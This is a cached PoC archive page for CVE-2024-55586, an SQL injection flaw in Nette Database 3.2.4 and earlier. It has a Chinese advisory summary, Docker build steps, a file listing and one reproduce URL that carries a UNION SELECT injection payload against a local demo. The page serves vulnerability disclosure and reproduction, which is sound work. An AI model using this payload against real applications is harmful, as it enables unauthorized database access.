CVE-2024-55586 PoC — Nette Database 安全漏洞

Source

https://github.com/CSIRTTrizna/CVE-2024-55586

Associated Vulnerability

Title:Nette Database 安全漏洞 (CVE-2024-55586)
Description:Nette Database是Nette开源的一个具有熟悉的 PDO 类 API 但功能更强大的数据库层。 Nette Database 3.2.4及之前版本存在安全漏洞，该漏洞源于存在SQL注入漏洞，导致攻击者可以通过构造恶意的SQL语句来操纵数据库的查询逻辑。

Readme

Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/?id%3d1)+UNION+SELECT+2,version()+FROM+test+WHERE+(1=1```

File Snapshot


 [4.0K]  /data/pocs/443e2ad1368fad64a662163422345a2fa919dfac
├── [4.0K]  demo
│   ├── [ 529]  Dockerfile
│   └── [4.0K]  src
│       ├── [4.0K]  app
│       │   ├── [ 655]  Bootstrap.php
│       │   ├── [4.0K]  Core
│       │   │   └── [ 349]  RouterFactory.php
│       │   ├── [4.0K]  Model
│       │   │   └── [ 625]  TestFacade.php
│       │   └── [4.0K]  UI
│       │       ├── [ 486]  @layout.latte
│       │       └── [4.0K]  Test
│       │           ├── [ 761]  all.latte
│       │           └── [ 611]  TestPresenter.php
│       ├── [ 832]  composer.json
│       ├── [ 53K]  composer.lock
│       ├── [4.0K]  config
│       │   ├── [ 202]  common.neon
│       │   └── [ 146]  services.neon
│       ├── [ 269]  index.php
│       └── [1.6K]  readme.md
├── [ 704]  docker-compose.yml
├── [4.0K]  postgres
│   └── [ 115]  init.sql
└── [ 175]  README.md

9 directories, 16 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!